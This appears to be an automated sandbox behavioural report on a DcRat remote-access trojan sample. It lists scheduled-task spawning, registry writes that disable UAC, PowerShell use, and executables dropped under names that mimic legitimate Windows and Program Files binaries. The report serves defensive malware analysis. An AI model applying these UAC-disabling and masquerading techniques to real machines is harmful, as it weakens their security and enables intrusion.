Analysis: behavioral2

Detonation Overview

Submitted

2024-05-16 01:57

Reported

2024-05-16 01:59

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\networklist\icons\sihost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\SysWOW64\networklist\icons\66fc9ff0ee96c2 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\SysWOW64\networklist\icons\sihost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Mail\cc11b995f2a76d C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\VideoLAN\upfc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\VideoLAN\ea1d8f6d871115 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Uninstall Information\upfc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Mail\winlogon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
